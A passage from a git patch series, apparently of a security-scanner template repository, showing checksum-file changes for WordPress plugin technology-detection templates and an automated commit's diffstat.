-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7059,7 +7059,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:76e1da4a7cb61f3c50e0e989e0a4d29d7c1ecba2 +templates-checksum.txt:931fe95f189ef70576b754feb31d430f5b462c11 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 8ca95b2013231a1ef44bdccb09ae34f1034012af Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 05:35:32 +0000 Subject: [PATCH 0293/1090] TemplateMan Update [Tue Sep 12 05:35:32 UTC 2023] :robot: --- http/exposures/files/drupal-install.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + 